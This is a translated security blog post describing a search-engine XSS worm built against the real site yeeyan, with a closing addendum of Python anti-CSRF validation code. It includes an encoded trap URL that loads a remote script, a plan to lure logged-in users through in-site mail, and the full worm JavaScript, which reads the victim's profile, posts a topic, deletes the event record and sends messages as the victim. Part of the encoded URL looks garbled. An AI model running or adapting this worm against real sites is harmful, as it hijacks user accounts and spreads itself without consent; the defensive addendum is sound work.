Author: cosine
From 0x37 Security
It is interesting to have a challenge. To build a Search Engine XSS Worm, yeeyan is used here for the experiment, and the trap can only be constructed like this:
http://www.yeeyan.com/main/ysearch?q=%3Cs%63%72ipt%3Eeval(%53%74ring.f%72om%43%68ar%43ode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,60,115,99,114,105,112,116,32,115,114,104,116,116,112,47,119,119,119,99,111,109,47,121,121,46,106,115,47,115,99,114,105,112,116,63%,41)%3C/s%72ipt%3E
Originally, cross-site scripting in a search engine is not much fun to do, but this time on yeeyan we can use this easily overlooked point to create an XSS worm. To create a worm, the following problems must be solved:
Q1: How does the Search Engine XSS Trap contain the remote worm?
A1: Because the worm has a lot of code, it cannot all appear in this XSS Trap at once (compare my own mini XSS Worm). Therefore, the XSS Trap is used to call the remote worm. There are many ways to do this; decode this XSS Trap and you will know my method :)
Q2: How can other authenticated users be made to access this Search Engine XSS Trap?
A2: Send in-site mail to several users (the worm can send it in batches) to trick them into visiting the trap. Once they visit, the XSS Trap calls the remote worm, and the worm obtains their friends' information and mailboxes, and so on for further users. Therefore, the Search Engine XSS Trap can be spread widely through the in-site mail system.
Q3: How does the worm obtain the flag information of the user who accessed the Search Engine XSS Trap?
A3: This is very important. The spread of the worm requires many hosts, and to obtain these hosts you must be able to clearly obtain specific user flag information, such as the user's ID and space address. Once the worm spreads, it is explosive :).
I have solved these problems, so yeeyan's Search Engine XSS Worm was born successfully. The code for the worm is as follows:
var _x = false;
if (window.XMLHttpRequest) {
    _x = new XMLHttpRequest();
} else if (window.ActiveXObject) {
    _x = new ActiveXObject("Msxml2.XMLHTTP");
    if (!_x) { _x = new ActiveXObject("Microsoft.XMLHTTP"); }
}
_1();

function _1() {
    // Fetch the victim's own profile page and pull the group id out of it.
    var _u = _3or7("GET", "http://www.yeeyan.com/space/showme", null);
    re = /<a href="\/space\/groups\/(.*?)">/i;
    r = _u.match(re);
    src = "http://www.yeeyan.com/groups/newTopic";
    var _txt = "hello yeeyan.";
    // Hand-built multipart/form-data body: each part starts with the boundary
    // from the Content-Type header prefixed by two extra dashes, CRLF-separated.
    argv_1 = "";
    argv_1 += "-------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[Post][content]\"\r\n\r\n";
    argv_1 += (_txt + "\r\n");
    argv_1 += "-------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"ymsggroup\"\r\n\r\n";
    argv_1 += ("" + "\r\n");
    argv_1 += "-------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"ymsgee\"\r\n\r\n";
    argv_1 += (r[1] + "\r\n");
    argv_1 += "-------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"ymsgee_username\"\r\n\r\n";
    argv_1 += (r[1] + "\r\n");
    argv_1 += "-------------------7964f8dddeb95fc5--\r\n";
    _3or7("POST", src, argv_1);
    var _del = _3or7("GET", "http://www.yeeyan.com/space/deleteEvent/15429", null);
    // Delete the record just like this :)
    _2();
}

function _2() {
    src = "http://www.yeeyan.com/space/compose_message";
    var _to = "Yasmin";
    var _s = "yeeyan";
    var _m = "HELL )";
    argv_1 = "";
    argv_1 += "-------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[receiver_name]\"\r\n\r\n";
    argv_1 += (_to + "\r\n");
    argv_1 += "-------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[subject]\"\r\n\r\n";
    argv_1 += (_s + "\r\n");
    argv_1 += "-------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[message][content]\"\r\n\r\n";
    argv_1 += (_m + "\r\n");
    argv_1 += "-------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[message_id]\"\r\n\r\n";
    argv_1 += ("" + "\r\n");
    argv_1 += "-------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[action]\"\r\n\r\n";
    argv_1 += ("send" + "\r\n");
    argv_1 += "-------------------7964f8dddeb95fc5--\r\n";
    _3or7("POST", src, argv_1);
    alert(0);
}

// Synchronous XHR helper: method, URL, body; returns the response text.
function _3or7(_m, _s, _) {
    _x.open(_m, _s, false);
    if (_m == "POST") _x.setRequestHeader("Content-Type", "multipart/form-data; boundary=-----------------7964f8dddeb95fc5");
    _x.send(_);
    return _x.responseText;
}
To understand the code, refer to my previous article; here is the clue: http://www.0x37.com/post/2.html. The purpose of writing this worm was to verify the method mentioned in that article (http://www.0x37.com/post/2.html). I can only say that the foreigners were a little irresponsible :) and I had to re-code it. The method works in theory, but in practice it gave me trouble. Still, it is easy to construct the HTTP headers and body to POST the worm's information. This is the first time I have used a search engine to create a worm. As long as the XSS Trap strictly meets the same-domain requirement of the target attack point, it is OK.
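The worm's _1() and _2() succeed because the newTopic and compose_message endpoints accept a hand-built multipart body that names the victim's session but nothing that proves the user intended the request. The following server-side gate is an added example, not code from yeeyan or from the original post: it parses a multipart/form-data body of exactly the shape the worm builds and rejects it unless a per-session anti-CSRF token (assumed field name csrf_token, HMAC of the session id under a placeholder server secret) is present and correct.

```python
import hashlib
import hmac
import re

# Constructed placeholder; a real deployment keeps this secret out of source.
SERVER_SECRET = b"placeholder-server-secret"


def expected_token(session_id):
    """Per-session anti-CSRF token: HMAC-SHA256 of the session id."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def parse_multipart(content_type, body):
    """Minimal parser for the text-only multipart/form-data bodies the worm
    hand-builds: the part delimiter is '--' + the Content-Type boundary."""
    match = re.search(r'boundary=([^;]+)', content_type)
    if not match:
        raise ValueError("no boundary in Content-Type")
    delimiter = "--" + match.group(1).strip()
    fields = {}
    for part in body.split(delimiter):
        part = part.strip("\r\n")
        if not part or part == "--":      # preamble or closing "--"
            continue
        header, _, value = part.partition("\r\n\r\n")
        name = re.search(r'name="([^"]+)"', header)
        if name:
            fields[name.group(1)] = value
    return fields


def accept_message_post(session_id, content_type, body):
    """Gate for compose_message: reject unless the form carries the session's
    token. Returns (accepted, fields_or_reason)."""
    fields = parse_multipart(content_type, body)
    token = fields.get("csrf_token", "")
    if not hmac.compare_digest(token, expected_token(session_id)):
        return False, "missing or wrong csrf_token"
    return True, fields


# Constructed request builder mirroring the shape of the worm's _2() body.
BOUNDARY = "---------------------------7964f8dddeb95fc5"
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY


def build_body(fields):
    out = ""
    for name, value in fields.items():
        out += "--%s\r\nContent-Disposition: form-data; name=\"%s\"\r\n\r\n%s\r\n" % (BOUNDARY, name, value)
    return out + "--" + BOUNDARY + "--\r\n"
```

A token of this kind stops the cross-site case, but script already running in the site's own origin, as the trap above does, can fetch the token from any page that embeds it, so the first fix remains HTML-encoding the reflected search term and the token is the second line of defence.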